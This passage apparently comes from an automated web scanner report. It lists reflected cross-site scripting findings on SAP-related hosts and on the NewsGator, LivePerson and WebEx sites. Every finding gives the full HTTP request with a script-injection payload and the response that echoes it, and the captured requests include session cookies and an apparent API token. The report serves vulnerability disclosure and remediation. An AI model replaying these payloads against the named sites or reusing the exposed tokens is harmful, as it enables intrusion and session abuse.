Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:01 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 87

File not found: /fstatic/stylesheetsbdedf<script>alert(1)</script>e23ec0fffc8/help.css

1.34. http://help.sap.com/fstatic/stylesheets/help.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/stylesheets/help.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76ca2<script>alert(1)</script>458600cdb88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/stylesheets/help.css76ca2<script>alert(1)</script>458600cdb88?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:05 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 87

File not found: /fstatic/stylesheets/help.css76ca2<script>alert(1)</script>458600cdb88

1.35. http://help.sap.com/fstatic/stylesheets/print.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/stylesheets/print.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 632b4<script>alert(1)</script>7547db97ab4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/stylesheets632b4<script>alert(1)</script>7547db97ab4/print.css?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:14 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 88

File not found: /fstatic/stylesheets632b4<script>alert(1)</script>7547db97ab4/print.css

1.36. http://help.sap.com/fstatic/stylesheets/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.sap.com
Path:   /fstatic/stylesheets/print.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22016<script>alert(1)</script>659c332aa84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fstatic/stylesheets/print.css22016<script>alert(1)</script>659c332aa84?1319720111 HTTP/1.1
Host: help.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://help.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; BIGipServersaphelp_old_help.sap.com=2674004140.20480.0000; shpuvid=172.16.92.241.1321213592635805; BIGipServersaphelp_prod_green=777785516.36895.0000; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Ahelp-portal%7C1321215433150%3B%20pe%3Dno%2520value%7C1321215433154%3B%20c3%3Dno%2520value%7C1321215433157%3B%20s_nr%3D1321213633168-Returning%7C1323805633168%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813633173%3B%20s_visit%3D1%7C1321215433175%3B%20gpv_p47%3Dno%2520value%7C1321215433180%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 19:51:17 GMT
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Fri, 26 Oct 2012 14:55:31 GMT
Content-Type: text/plain
Content-Length: 88

File not found: /fstatic/stylesheets/print.css22016<script>alert(1)</script>659c332aa84

1.37. http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 91605<script>alert(1)</script>f31917c8368 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?load=data&apiToken=EDB2843ABF6248059210D3EA1ABD7D42&buzzId=153692&_dsrId=ngbuzz_153692_data91605<script>alert(1)</script>f31917c8368 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sdn.sap.com/irj/sdn
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1111194646.1318692406.1318692406.1321043157.2; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sun, 13 Nov 2011 19:38:30 GMT
ETag: 634568099105169583
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 1341
Cache-Control: public, max-age=300
Date: Sun, 13 Nov 2011 19:44:47 GMT
Connection: close

window.ng_scriptload({id:'ngbuzz_153692_data91605<script>alert(1)</script>f31917c8368',status:200,statusText:'200 OK',response:{Data:[{PostId:21198566603,PubDate:new Date(1321177020000),FeedName:'SAP Developer Network SAP Weblogs by Daniel Graversen',Title:'My thoughts on SAP Teched Ma
...[SNIP]...

1.38. http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload dfe81<script>alert(1)</script>16777f97ec5 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/buzz.ashx?buzzId=153692dfe81<script>alert(1)</script>16777f97ec5&apiToken=EDB2843ABF6248059210D3EA1ABD7D42 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sdn.sap.com/irj/sdn
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1111194646.1318692406.1318692406.1321043157.2; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 102
Cache-Control: private, max-age=600
Date: Sun, 13 Nov 2011 19:44:36 GMT
Connection: close
X-N: S

//An error occurred: Could not find Buzz item with id: 153692dfe81<script>alert(1)</script>16777f97ec5

1.39. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fa9d5%3balert(1)//f42b4d2691c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa9d5;alert(1)//f42b4d2691c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/buzz.ashx?buzzId=153692&apiToken=EDB2843ABF6248059210D3EA1ABD7D42&fa9d5%3balert(1)//f42b4d2691c=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sdn.sap.com/irj/sdn
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1111194646.1318692406.1318692406.1321043157.2; __utmz=1.1318692406.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Tue, 25 Oct 2011 17:37:44 GMT
ETag: 634551610649982500
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 4556
Cache-Control: public, max-age=600
Date: Sun, 13 Nov 2011 19:44:37 GMT
Connection: close

try{var buzzTemplate_153692="<!--\nChange Log:\n- Nov 05, 2008: Initial setting (BB)\n- Nov 22, 2008: Remove 'get this' (JF)\n- Dec 03, 2008: Add embed code\n- Sept 14, 2009: Remove https\n-->\n{strin
...[SNIP]...
e:'6679',buzzAppUrl:'http://nmp.newsgator.com/NGBuzz/',templateId:'buzzTemplate_153692',targetId:null,fbApiKey:'2cca3673a679a63cbf1192c6cde166e6',apiToken:'EDB2843ABF6248059210D3EA1ABD7D42',extraArgs:{fa9d5;alert(1)//f42b4d2691c:'1'},buzzId:153692,analytics:{ngAcct:'UA-130916-2'},directUrl:'http://hosted.newsgator.com/',name:'_Mentors - SAP Mentors on SDN'});
           
           b._targetId = targetId;
           
           b.render();
       } else {

...[SNIP]...

1.40. http://sales.liveperson.net/hc/37021986/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 9d28d<img%20src%3da%20onerror%3dalert(1)>40b9e83325f was submitted in the msessionkey parameter. This input was echoed as 9d28d<img src=a onerror=alert(1)>40b9e83325f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/37021986/?&visitor=5110247826455&msessionkey=80525864578317730079d28d<img%20src%3da%20onerror%3dalert(1)>40b9e83325f&siteContainer=STANDALONE&site=37021986&cmd=mTagKnockPage&lpCallId=551520632114-582273714477&protV=20&lpjson=1&id=1423715572&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-general-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C%23chat-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic1%7C%23chat-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic2%7C%23chat-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpChatButtonDivDynamic3%7C%23voice-sales-sap-general-us-en-dynamic-1%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic1%7C%23voice-sales-sap-general-us-en-dynamic-2%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic2%7C%23voice-sales-sap-general-us-en-dynamic-3%7ClpMTagConfig.db2%7ClpVoiceButtonDivDynamic3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1321206470853; ASPSESSIONIDQACACSDA=BKMLJANDIIIFOIPJJHMEEEFC

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:05:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=80525864578317730079d28d<img src=a onerror=alert(1)>40b9e83325f; path=/hc/37021986
Set-Cookie: HumanClickKEY=80525864578317730079d28d<img src=a onerror=alert(1)>40b9e83325f; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sun, 13 Nov 2011 19:05:11 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 46888

lpConnLib.Process({"ResultSet": {"lpCallId":"551520632114-582273714477","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='5110247826455'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='80525864578317730079d28d<img src=a onerror=alert(1)>40b9e83325f';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

1.41. http://sap.webex.com/dispatcher/dispatcher.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.webex.com
Path:   /dispatcher/dispatcher.do

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 935b5<img%20src%3da%20onerror%3dalert(1)>2e12ad7827b was submitted in the REST URL parameter 1. This input was echoed as 935b5<img src=a onerror=alert(1)>2e12ad7827b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /dispatcher935b5<img%20src%3da%20onerror%3dalert(1)>2e12ad7827b/dispatcher.do? HTTP/1.1
Host: sap.webex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://connect.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:12:37 GMT
Server: Apache
Set-Cookie: galaxym=R684996998; path=/
Content-Length: 93
Set-Cookie: JSESSIONID=STpQTQWF4yrTv4sTXynlyZn73YHqKDwwhFWP2R2LVRW1dGKRCMmX!-536370640; path=/
Connection: close
Content-Type: text/html

Invalid path /dispatcher935b5<img src=a onerror=alert(1)>2e12ad7827b/dispatcher was requested

1.42. https://sap.webex.com/cmp0306lc/webcomponents/widget/detect.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sap.webex.com
Path:   /cmp0306lc/webcomponents/widget/detect.do

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdf7b<img%20src%3da%20onerror%3dalert(1)>588ade06a44 was submitted in the REST URL parameter 1. This input was echoed as bdf7b<img src=a onerror=alert(1)>588ade06a44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cmp0306lcbdf7b<img%20src%3da%20onerror%3dalert(1)>588ade06a44/webcomponents/widget/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787

Response

HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:42 GMT
Server: Apache
Set-Cookie: galaxym=R1412479787; path=/
Content-Length: 109
Connection: close
Content-Type: text/html

Invalid path /cmp0306lcbdf7b<img src=a onerror=alert(1)>588ade06a44/webcomponents/widget/detect was requested

1.43. https://sap.webex.com/cmp0306lc/webcomponents/widget/detect.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sap.webex.com
Path:   /cmp0306lc/webcomponents/widget/detect.do

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cfb5a<img%20src%3da%20onerror%3dalert(1)>1c69d944d2e was submitted in the REST URL parameter 2. This input was echoed as cfb5a<img src=a onerror=alert(1)>1c69d944d2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cmp0306lc/webcomponentscfb5a<img%20src%3da%20onerror%3dalert(1)>1c69d944d2e/widget/detect.do?siteurl=sap&LID=1&RID=2&TID=21&backUrl=%2Fmw0306lc%2Fmywebex%2Fdefault.do%3Fsiteurl%3Dsap HTTP/1.1
Host: sap.webex.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=pbr8TQWfSkNTbGgl5yGYhLhs7wS9yGt7JGgQh01Grm1Td0vFRSqf!-74812280; galaxym=R1412479787

Response

HTTP/1.1 400 Bad Request
Date: Sun, 13 Nov 2011 19:13:47 GMT
Server: Apache
Set-Cookie: galaxym=R3025651845; path=/
Content-Length: 99
Set-Cookie: JSESSIONID=kThMTQWL1D80cqCwXXnLmQpnVPGRvQv6tTBG7LJG4qgrrQx9QXSW!-363712497; path=/
P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html

Invalid path /webcomponentscfb5a<img src=a onerror=alert(1)>1c69d944d2e/widget/detect was requested

